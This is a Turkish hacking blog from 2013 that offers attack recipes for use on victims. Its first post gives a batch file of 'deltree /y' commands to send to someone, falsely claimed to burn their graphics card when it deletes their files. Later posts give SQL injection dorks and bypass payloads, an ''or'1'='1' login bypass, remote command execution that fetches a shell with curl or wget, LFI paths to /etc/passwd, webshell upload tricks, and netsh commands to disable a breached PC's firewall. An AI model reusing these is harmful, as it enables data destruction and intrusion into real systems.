HackTeam44

HackTeam44 Turkish Hacking&Security Platform

10/12/2013

Ekran Kartı Yakma (Kesinlikle Kendiniz Açmayın)

off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
off
cls
cls
.:: Hacker by::.
off3.

kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda Hacker By yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin...

10/12/2013

Bir Hacker İşini Nasıl Yapar ?

Hacker elinde hedefine ait az yada hiç olmayan bilgilerle işe başlar; öyleki küçük analaziler sonunda yol haritasını belirleyeceği yeterli bilgiye ulaşır. Bu ancak dikkatli bir analiz ve sistemli bir araştırma sonucu elde edilebilir.

Hackerların genellikle kullandığı yöntemler 7 adımdan oluşur:

1. Hedifin ayak izlerini analiz et
2. Bilgileri sırala
3. Kullanıcı bilgilerine ulaş
4. Ayrıcalıklarını arttır
5. Ekstra şifre ve gizli bilgileri kopar
6. Arka kapıyı kur
7. İçeri gir sistemi devir

Hacker önce hedef alacağı alan adlarını saptar. Daha sonra, bunların ayak izlerini takip ederi. Bu takip heefi hakkında edinebilecek en fazla bilgiye ulaşmak içindir. Bu takibi, hedefine ait bilgilerin herkese açık kaynaklardan yapar.

Ayak izi analizinin sonunda hacker şu bilgilere ulaşaır:
- Hedefin büyüklüğü
- Potansiyel giriş noktları
- Güvenlik mekanizmasının olup olmadığı varsa bunun ne olduğu

Ayak izi analizi sırasında hacker, saldırı sırasında işine yarayacak bilgiler elde etmeye çalışır. Bu bilgiler:

• Şirket adları
• Alan adları
• Şubeleri
• IP adresleri
• Telefon numaraları

Ayak izi analizi sonrasında hacker elde ettiği bilgiler ve bu bilgiler doğrultusunda çizdiği yol haritası sonucunda hedefin ağ bilgilerine ulaşmış olur. Ardından bu bilgeler ile hedef sistem hakkında edinebildiği kadar fazla dataya ulaşmaya çalışır.

Hacker, hedefin ne tür bir ağ, FTP veya mail server kullandığını, TCP ve UDP portlarına bağlanarak yada bu bu portları dinleyerek ve bu portlara rasgele veriler gönderek belirler. Birçok servis, genel olarak kendilerine gelen bu rastgele verilere yanıt verir bu yanıtlar da hackerlar için aradıklarını bulma noktasında son derece faydalıdır.

Hacker bu bilgileri oluşturduğu, hassasiyet veri tabanına yollar.

Bu veritabanında saklanan hassas bilgiler, eğer hacker hedifin sunucusu ile temas kurabilmişse, şunlardır:

• Kullanıcı adları
• Son giriş yaptığı tarih
• Şifre değişim günler
• Tanımlandığı kullanıcı grupları

Hacker sorgulama sonucu ulaştığı bu bilgileri, sisteme, kayıtlı kullanıcı girişi için yapacağı şiddetli saldırıda kullanacak. Örneğin hackerın karşılaştığı TEST yada BACKUP gibi kullanıcı adları genel olarak şifreleri kolay tahimin edilebilir türden kullanıcı adlarıdır. Bu da hackerın işini oldukça kolaylaştırır. Hele bu kullanıcılar Lokal Admin ise...Hedefi hakkında yeterli bilgileri elde eden hacker, artık sisteme o şirkette çalışan herhangi birinini kullanıcı adına ulaşmış olur. Bu şu manaya gelmektedir: Hackerın tek bir ihtiayacı kalmışıtır. O da kullanıcıların şifreleri.Şifreleri elde etmenin iki yolu vardır: Sosyal mühendislik (şifreleri tahimn etme) yada sistem saldırıları ve veri tabanlarına ulaşma.Hacker bir şifre buluduktan ve şifresini ele geçirdiği kulanıcıcın sistem üzerindeki yetkilerini öğrendikten sonra, bu kullanıcıcn sistem üzerindeki izinlerini arttırmaya çalışır (admin değil ise)Eğer hacker kullanıcının izinlerini ssitem yöneticisi (admin) şeklinde arttırabilmişse işte o andan itibaren herşey kontrolu altında demektir...

Birşeyler öğrendiyseniz emeği karşılıksız bırakmamak adına teşekkürlerinizi görelim.

ÖyIe karanIık oIurki bazen hayat bin ışık yaksan bir damIa aydınIık buIamazsın. Ama çok sevdiğin birinin güIümsemesiyIe ...
10/12/2013

ÖyIe karanIık oIurki bazen hayat bin ışık yaksan bir damIa aydınIık buIamazsın. Ama çok sevdiğin birinin güIümsemesiyIe unutursun

Kaynak : Etkileyici Mesajlar, Etkileyici Mesaj, Etkileyici Mesajlar 2013
http://www.neguzelsozler.com/guzel-sozler/etkileyici-mesajlar.html

Sayfamızda Etkileyici Mesajlar yer almaktadır.

22/11/2013

Genel Hacking Yöntemleri | Part 1 - |



SQL İnjection İle Başliyalim...

Web masterlarin scriptleri kodlarken yaptıkları ufak tefek hatalar yaparak siteye sql injection hatasını oluşturuyor..SQL injection kendi arasındada çeşitli bölümlere ayrılır.Asp,Asp.net,Php,Html sitelerde ayrı ayrı olarak

1 ) String injection ve mod security hatası bypass

Alıntı:
Dork : "inurl:"sayfa.php?id=1" "intext:"Copyright © 2011 tht"
Exploit : -1’ /*!UnIoN*/ /*!SeLeCt*/ 1,2,(select group_concat(char(60,112,62),/*!table_name*/)+from+`information_schema`.`tables`),4,5,6 /*!and*/ ’x’=’y
Detayli anlatım için videoyu izleyebilirsiniz =>

2 ) Postgre SQL injection and shell upload

Bu yöntem sayesinde admin paneline şifresiz giriş yaptıktan sonra shellimizi upload edip sunucuda root olduktan sonra masslarız.İstersekte rootkik kurarız veya downloader katarız

site.com/login.asp
site.com/login.aspx
site.com/yonetım.aspx
site.com/koordınator.aspx

siteye girdikten sonra komutlarımız şunlar çok kısa ve öz hiç bir şey bilmenize gerek yok bunu yapabilmek için.

k.adı : ’or’
şifre : ’or’

veya

email : ’or’1’=’1’

sadece bunu yazıp giriş yapabiliriz.

Daha detayli anlatım için videoyu izleyebilirsiniz =>

3 ) Waf bypass yöntemi

arkadaşlar bazı sitelerde komutları yazsanızda bilgiler karşınıza gelmez veya ne bilim bilgileri göstermez.Sitede bazı karakterlere karşı filtreleme vardır.Bunları aşmak için geliştirilmiş güzel bir yöntemdir.Waf Bypass.

Detaylı anlatım için videoyu izleyebilirsiniz

4 ) 406 not acceptle bypass

Bazı sitelerde komutu girerseniz sayıları yansıtmak için.406 ile karşılarsınız bunun içinde gerekli olan bypass yöntemiyle ilgili bir video sizlerle paylaşmak isterim

Detayli bilgi için buradan izleyebilirsiniz =>

5 ) Load_File komutu ile etc/passwd okuma

Detayli anlatım için video izleyebilirsiniz =>

6 ) Havij hakkında

Bana kalırsa havij ezik bir program.Kendi toolunu kodlamadıktan sonra SQL İnjectiondan keyif alamazsın.

1. Eksiklik waf bypass işlemi gerçekleştirmiyor.
2. Eksiklik 406 not acceptle bypass etmiyor.
3. Eksiklik string sql ve mode_security_bypass özelliği yok.
4. Eksiklik blind injectionda sanıldığı kadar iyi değil

7 ) RCE ( Remote Command Ex*****on)

Uzaktan kod çalıştırmaya yarayan basit gibi görünen kısa zamanda amacımıza ulaşabileceğimiz bir açık türüdür.

inurl:’’faq.php?cmd’’
site.com/faq.php?cmd=ls -la (Linux komutları hayalinize kalmış )
curl veya wget ile shell çekip serverı ister rootlayın ister masslayın ister domain hack edin isterse scriptini kullanın.

Detayli videolarımız ;

-http://www.youtube.com/watch?v=ee359qNF79Q
-http://www.youtube.com/watch?v=qMyftbRsPrA

8 ) LFİ(Lemote file inclusion)

Linux dosyalarını okumamızı sağlayan bir yöntemdir.

Kod:
site.com/page.php?id=../../../../etc/passwd%00
site.com/page.php?id=../../../../proc/self/environ%00
ve tamper data ile shell upload edebiliriz.

Lfi bypass videosu priv8 sayılabilir belki.

Video buradan izleyebilirsiniz

9 ) Symlink ile config çekmek

Buradan video izleyebilirsiniz

22/11/2013

Port Açamayanlar cmd ile port açma ..

Arabilgi eğer bir pc sızdınız ve firewall sizi rahatsız ediyorsa burdaki komut zincirini kullanarak nasıl disable veya enable veya port açılıcağını göstericem
Xp için
Başlat > Çalıştır > CMD
Dizin açıldıktan sonra.
netsh firewall show config (burda firewall durumunu görebilirsiniz açıkmı kapalımı hangi port açık hangi port kapalı oldunu)
This image has been resized.Click to view original image

(copy con bat dosyası oluşturma kodudur. istersenizde manuel olarakta girebilirsiniz)
Firewall Aktifleştirmek için
Copy con aktif.bat
netsh firewall set opmode enable
CTRL + Z Enter
Sonra
aktif.bat diyerek oluşturdumuz kodu aktifleştirebilirsiniz.
This image has been resized.Click to view original image

Firewall pasifleştirmek için ise
copy con pasif.bat
netsh firewall set opmode disable
CTRL + Z Enter
pasif.bat enter
This image has been resized.Click to view original image

POrt açmak için ise
Copy con portacma.bat
netsh firewall add portopening TCP 80 Webserver
netsh firewall add portopening TCP 21 FTPserver
CTRL +Z enter
portacma.bat kullanarak açabilirsiniz
Xp de son kısıma Port silmeye
Copy con portsilme.bat
netsh firewall delete portopening TCP 80
netsh firewall delete portopening TCP 21
CTRL + Z Enter
Portsilme.bat enter
Vista , Windows7 için
öncelikle CMD sağ tıklıyıp yönetici olarak başlatmalısınız aksi taktirde girilen kodların hiç biri işe yaramıcaktır.
Firewall aktifleştirme
Copy con aktif.bat
netsh advfirewall set currentprofile state on
CTRL + Z enter
Aktif.bat enter
Firewall Pasifleştirme
Copy con pasif.bat
netsh advfirewall set currentprofile state off
CTRL + Z Enter
Pasif.bat enter
Port açma
copy con portacma.bat
netsh advfirewall firewall add rule name=”WebServer” dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name=”FTPServer” dir=in action=allow protocol=TCP localport=21
CTRL + Z Enter
Portacma.bat enter
Port silme
Copy con portsilme.bat
netsh advfirewall firewall delete rule name=all protocol=tcp localport=80
netsh advfirewall firewall delete rule name=all protocol=tcp localport=21
CTRL + Z
Portsilme.bat enter

Facebook sayfamızı beğenin.

22/11/2013

Shell Nedir? Nasıl Atılır? Neye Yarar?

Shell Nedir? Nasıl Atılır? Neye Yarar?
Sorular. Maddeler. Başlıklar.

1) shell nedir?
2) shell Nasıl Atılır?
3) Kaç Tür shell Vardır?

Cevaplar.

1) shell nedir?

Shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Server(Host) Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Denilir.

Permissionları (İzinleri) Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. İzinleri Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.

Bir shelli En İyi Şekilde Kullanabilmek İçin shell Komutlarını İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Erişiminiz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.

Bir Çok Sunucuda Manuel Geçişlere İzin Verilmektedir. Spoll/Mail Kısmından Sunucudaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.

Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki Config Dosyalarına Ulaşıp Okuyarak SQL İle Erişim Sağlaya Biliriz...

shelli Ne İçin ve Hangi Aşamalarda Kullandığımızı Hacker Diliyle Anlattım Bir Diğer Maddeye Geçelim. Bu Maddemizde Anlamadığın veya Yeniden Anlatılmasını İstediğiniz Bir Yer Olursa Konu Aldında Belirtiniz.

2) shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz

1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı shell Yükleyebiliriz. veya Bağlandığımız .Txt shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.

Örnek:

SiteAdi.Com - Siteadi.com

İle Bağlandığımız Siteye .php Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.

SiteAdi.Com - Siteadi.com

Şeklinde Kullanıma Geçebiliriz.

RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.

2) SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Cracker Yardımıyla Kırarız.

Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.

SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.

3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.

Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.

4) Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli Resim Dosyası Olarak Görmesini Sağlarız.

Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.

upload.php , upload.asp , upload.htm , upload.html

Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.

5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.

6) Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.

7) Sosyal Mühendislik Yöntemiyle Siteye shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak shell Atabilir.

shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.

3) Kaç Tür shell Vardır?

Genel Olarak Kullanılan 2, 3 Çeşit shell Vardır. Bunarın Uzantıları .php, .asp ve .aspx Dir. Şuanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalışma Mantığı Aynı.

Ençok Kullanılan sheller:

C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)
R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)
CyberSpy5.asp ( Genelde Kullandığım sheller Arasındadır.)
LORD.aspx ( Zaman Zaman Kullandığım Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI İçin Kullanılan shellerdir)
NOT: RFI de .asp shell veya .php shell Kullanılmaz.

Şimdi Şöyle Bir Bakalım.
php Uzantılı sheller Unix, Linux, FreeBSD Sunucularında Kullanılır.asp Uzantılı sheller İse Windows Sunucularda Kullanılır.

Şimdi Siz Bir Linux Servere .asp Uzantılı shell Atamazsınız Atsanız Dahi Çalıştıramazsınız.

Ancak Windows Serverlere Nadirende Olsa Rastlamışımdır. .php Uzantılı sheller Atılabiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastladım. Yükleme ve Silme Yetkileri Bulunmamakta.

Bu Yüzden shell Yükleyeceğiniz Sitenin Sistemi İyi Bilmeniz Gerekiyor.

22/11/2013

Beyaz Sapkali Hackerlerin Egitimleri // Hacker By

Eğitim Tanımı

Beyaz Şapkalı Hacker eğitimi hackerların sistemlere sızmada kullandığı yöntemleri ve araçları detaylı ve uygulamalı bir şekilde anlatılarak proaktif güvenlik anlayışı kazandırma amaçlı bir eğitimdir. Benzeri eğitimlerden farkı eğitim içeriğinde gerçek dünyaya uygun uygulamaların kullanılması ve pratiğe önem verilmesidir. Beyaz şapkalı hacker eğitimi Ec-Council Certified Ethical Hacker v7 ve v8 ile uyumludur.

Kimler Katılmalı

Sistem yöneticiler
iAğ yöneticileri ve operatörleri
Ağ güvenliği yönetici ve operatörleri
Bilgi güvenliği uzmanları
Adli bilişim uzmanları
Bilişim hukuku alanı çalışanları

Eğitim İçeriği:

Güvenlik Testlerinde Bilgi Toplama
1. Bilgi toplama çeşitleri
1.1. Aktif bilgi toplama
1.2. Pasif bilgi toplama
2. Internete açık servisler üzerinden Bilgi Toplama
2.1. DNS Aracılığı ile
2.2. HTTP Aracılığı ile
2.3. SMTP üzerinden bilgi toplama
2.4. SNMP aracılığıyla bilgi toplama
3. Arama motorlarını kullanarak bilgi toplama
3.1. Bir şirkete ait e-posta bilgilerinin bulunması
3.2. Bir şirkete ait alt domain isimlerinin bulunması
4. Google Hacking yöntemleri ve hazır araçlar
5. Internete açık web sayfaları, e-posta listelerinden bilgi toplama
6. Yeni nesi bilgi toplama aracı Maltego

Güvenlik Duvarları(Firewall)

1. Güvenlik Duvarı Temelleri
1.1. Firewall(güvenlik duvarı) nedir, ne değildir?
1.2. Paketlere hangi seviyeye kadar mudahele edebilirler
1.3. Nat Kavramı
1.4. NAT, Çeşitleri ve Uygulama alanları
2. Packet Filtering
2.1. Stateful packet filtering
2.2. Stateless Packet Filtering
3. Authentication(Yetkilendirme)
4. Firewall Çeşitleri
4.1. Uygulama seviyesi
4.2. Bridge mode firewall
4.3. Kişisel güvenlik duvarları
4.4. Donanımsal/yazılımsal güvenlik duvarları
4.5. Proxy mod güvenlik duvarı
5. Firewall ürünleri
5.1. Açık kaynak kodlu
5.1.1. Linux iptables
5.1.2. OpenBSD Packet Filter
5.1.3. Pfsense
5.2. Linux Iptables ile güvenlik duvarı uygulamaları
5.2.1. İptables çalışma mantığı
5.2.2. Port açma, port kapama
5.2.3. Belirli ip adreslerine belirli servisler için erişim izni verme
5.2.4. L7 filter ile uygulama seviyesi güvenlik duvarı kullanımı
5.2.5. Ebtables ile L2 seviyesi güvenlik duvarı kullanımı
5.3. Ticari güvenlik duvarı ürünleri
5.3.1. Checkpoint, Netscreen, Fortinet, Kerio, Cisco ASA
5.4. Firewall Testleri
5.4.1. Antispoof testi
5.4.2. Parçalanmış paketleri geçirme testleri
5.4.3. Dayanıklılık testleri
5.4.4. Isic, hping, Nmap ile test çalışmaları
5.5. Firewall kural testleri
5.5.1. Ftester, hping, firewallk ile test çalışmaları

Saldırı Tespit ve Engelleme Sistemleri

1. IDS, IPS, NIDS, NIPS, HIPS Tanımları
2. IDS/IPS(SALDIRI TESPIT VE ENGELLEME) Teknolojileri
3. Host tabanlı IDS/IPS Sistemleri
3.1. Ossec Kullanımı
4. Ağ Tabanlı IDS/IPS Sistemleri
5. Ağ tabanlı IDS’lerin çalışma yöntemleri
6. IDS/IPS Yerleşim Planlaması
7. Açık Kaynak kodlu IDS/IPS Yazılımları
7.1. Snort, BroIds, Suricata
8. Snort Saldırı Tespit ve Engelleme Sistemi
8.1. Snort IDS Kurulumu
8.2. Snort’u (N)IDS Olarak yapılandırma
8.3. Snort kurallarını anlama ve yorumlama
8.4. Snort’a saldırı kuralı yazma
8.5. Saldırı loglarını inceleme ve yorumlama
8.6. Snort’u IPS olarak Kullanma
8.7. Snort yönetim araçları
9. Tuzak (Honeypot) Sistemler
9.1. Kfsensor ile honeypot uygulaması
9.2. Honeyd ile honeypot çalışmaları

DOS/DDOS Saldırıları ve Korunma Yöntemleri

1. Denial Of Service Atakları
1.1. Çeşitleri
1.2. Amaçları
1.3. DOS Atak Çeşitleri
1.3.1. Smurf, Ping Of Death, TearDrop, SYN Flood, UDPFlood
2. DDOS Atakları
3. DDOS Çeşitleri ve Araçları
3.1. SYN Flood, UDPFlood, icmpflood, smurf, fraggle, http flood
4. DDOS amaçlı kullanılan WORMlar.
5. Ircbot, zombie, BotNet Kavramları
6. Botnet kullanım alanları
7. Fast-Flux networkler ve çalışma yapıları
8. DNS sunuculara yönelik DDOS saldırıları
9. Kablosuz Ağlara yapilan DOS saldirilari
10. DOS/DDOS Saldırılarından Korunma Yolları
10.1. Syn cookie, syn proxy, syn cache yöntemleri

Web Uygulama Güvenliği ve Hacking Yöntemleri

1. Web Uygulamaları ve http
1.1. http protokol detayları
1.2. Web uygulama bileşenleri
2. Geleneksel güvenlik anlayışı ve web
uygulama güvenliği
3. Web uygulama güvenliğinde kavramlar
3.1. Hacking, Defacement, Rooting, shell vs
4. Web uygulama/site güvenliği nelere bağlıdır?
5. Web uygulamalarında hacking amaçlı bilgi toplama
5.1. Web sunucu, uygulama versiyon keşfi
5.2. Hata mesajlarından bilgi toplama
5.3. Google kullanarak bilgi toplama
5.4. Alt dizin, dosya keşfi
5.5. Admin panel keşfi
6. Web güvenlik testlerinde kişisel Proxyler
6.1. Paros Proxy, WEbScarab, Burp Proxy
6.2. Firefox eklentileri
7. İstemci taraflı kontrolleri aşma
8. OWASP Top 10 açıklık rehberi
9. XSS, CSRF açıklıkları ve kötüye değerlendirme
9.1. XSS ,CSRF nedir, ne değildir?
9.2. XSS, CSRF ne amaçla kullanılır?
9.3. Çeşitleri nelerdir ve nasıl engellenebilir
10. SQL Injection zafiyetleri ve hacking amaçlı kullanımları
10.1. Dinamik web uygulamaları ve SQL
10.2. SQLi neden kaynaklanır, çeşitleri nelerdir?
10.3. SQLi örnekleri
10.4. Google’dan otomatik SQLi açıklığı arama
10.5. SQLi araçları ve kullanımı
10.5.1. Sqlmap, SQLi Finder, Pangolin
11. File inclusion zafiyetleri ve hacking amaçlı kullanımı
11.1. File inclusion çeşitleri
11.1.1. Local File inclusion
11.1.2. Remote file inclusion
12. Shell Çeşitleri ve kullanım amaçları
12.1. Shell kavramı ve kullanımı
12.2. PHP, ASP ve JSP shell çeşitleri
12.3. Sık kullanılan shell yazılımları
13. Web sunucularına yönelik DOS saldırıları
14. Web uygulama güvenlik duvarı yazılımları ve çalışma yöntemleri
15. Web uygulama güvenlik test yazılımları ve örnek sayfalar
16. Http authentication yöntemleri ve karşı saldırılar

22/11/2013

Facebook'tan Kolayca İp Bulma


Yapacağımız İş Çok Basit. URL Kısmına " graph.facebook.com/ " Yazıyoruz. Sonra Kendinizin ve ya Başkasının username'sini " graph.facebook.com/###x " ###x Kısmını silip oraya usernameyi yazıyoruz. ve karşımıza ID Numarası,Adı Soyadı vs. Geliyor.

Örnek: graph.facebook.com/zzz

22/11/2013

Güvenli internet filtresini aşma

Biliyorsunuz son derece saçma sapan bi uygulama sokuldu hayatımıza güvenli internet adı altında.
Neredeyse hiçbi siteye giremiyoruz kafalarına göre siteleri yasaklamışlar aşması da imkansız gibi.
Başıma benim de bu bela dadanınca çözüm bulma arayışına girdim ve buldum.
Hotspot var herkesin bildiği fakat o çalışmıyor aşırı reklam var vs.
Benim çözümüm securitykiss oldu.

SecurityKISS - Free VPN Service

Bu adresten indirip kuruyorsunuz.
Sonra açıyorsunuz programı altta server resmi var tıklayıp istediğiniz ülkeyi seçiyorsunuz.
Sonra connect diyorsunuz ve problemden kurtuluyorsunuz.

22/11/2013

İnternet ve Bilgisayar Güvenliği için Temel Önlemler Yazdır E-posta
Koray Doğu, Microsoft
Günümüzde, dünyada 400 milyon civarında İnternet'e bağlı bilgisayar, 1 milyarı aşkın İnternet kullanıcısı, 100 milyona yakın web sitesi olduğu tahmin ediliyor. Türkiye açısından bakıldığında bu rakam 15 milyona ulaşmış durumda; buradan İnternetin, olmazsa olmazlarımızın içine girmiş olduğunu çıkarabiliriz. İnternet'i kullanarak birçok işimizi halletmekteyiz; Örneğin e-posta yoluyla iletişim, bankacılık işlemleri, bir dosyayı karşıdan yükleme, bir ürün hakkında bilgi edinme, iş başvurusu yapma gibi pek çok amaç için kullanmaktayız. Bu büyük platformda, uygulamaları kullanırken kendi kişisel bilgilerimizi (kredi kartı numaramız,e-posta şifre veya kullanıcı adımız, özlük bilgilerimiz vs..) ortama sunmak durumunda kalıyoruz veya net üzerinden dosya,mail vb.. karşıdan yüklemelerimiz oluyor. Bu durumlarda güvenlik açısından önlemler almamız gerekir çünkü İnternet ortamında casus yazılımlar veya kimlik bilgilerinizin çalınması, kullanılmaya çalışılması gibi durumlarla karşı karşıya kalma ihtimalimiz oldukça yüksek. Bu önlemleri geniş bir şemsiye altında parçalara bölerek inceleyelim:

ms3.pngKarşıdan Dosya Yükleme Durumu
Bu duruma belki de İnternet'te en yaygın olarak kullandığımız veya ihtiyaç duyduğumuz teknoloji diyebiliriz. Dünya’nın öbür ucundan bir dosyayı ( müzik,film..) veya gelen bir e-postayı (excel,powerpoint veya bir rar dosyası), sizin kendi bilgisayarınıza, İnternet'i kullanarak indirebilmenizdir.Peki bu kadar sıklıkla kullandığımız bu durumu güvence altına nasıl alacağız? Çeşitli yöntemler;

Güncel antivirüs yazılımı kullanımı

ms4.png

Antivirüs Programı nedir ve ne yapar?

Malware (virusler,solucanlar,truva atları,casus yazılımlar..) gibi bilgisayara ve kullanıcıya (kullanıcı verileri,dosyaları..) ciddi zararlar verebilecek olan yazılımları saptama,silme ve bilgisayarı koruma en temel görevleri olup, aynı zamanda sürekli aktif halde çalışabilen ve güncellenmesi gereken yazılımlardır.

Antivirüs programları neden güncellenmelidir?

İnternet'te çok ciddi sayıda casus yazılımlar, solucanlar, keyloggerlar vs.. bulunmakta ve daha bilmediğimiz pek çok çeşit de ortaya çıkmaya devam edecek gibi görünüyor. Nasıl bilgisayarımız (işletim sistemimiz) sürekli güncellenmek durumundaysa aynı şekilde antivirüs programımızı da güncellemek durumundayız. Bunun nedeni zararlı yazılımların da günden güne gelişmesi ve antivirüs programlarını rahatlıkla aşabilecek duruma gelmesidir. Bu açıdan antivirüs programımızın güncellenme özelliği her zaman açık olmalı ve belirli aralıklarla, olaylara bağlı olarak bilgisayarımızı taratmalıyız. Son olarak ve en önemlisi de, antivirüs programmızı asla kapatmamalıyız.

Antivirüs programı kullanarak özel güvenlik önlemleri (Default Kullanıcı için)

Çok ciddi bir spesifikasyondan bahsetmek zor olur, çünkü tüm antivirüs yazılımları biz açık tuttuğumuz sürece kendi varsayılan ayarlarına göre görevlerini yerine getirirler; Fakat, basit görünen ama önemli önlemler de bulunmakta. (Özel (custom) ayarları dışında).

*Tüm gelen dosyalar veya e-posta yoluyla gelmiş olan ekleri antivirüs programımızı kullanarak taramak.

Bütün antivirüs programlarının bu özelliği vardır ve temel sayılabilcek bir özelliktir. Bizim karşıdan yüklediğimiz veya yükleyeceğimiz öğeyi,dosyayı.. virus taramasından geçirmemizde fayda vardır.

22/11/2013

Erzurum Emniyet Müdürlüğü'nden yazılı bir açıklama yapılarak bilgisayar güvenliği konusunda uyarılarda bulunuldu.

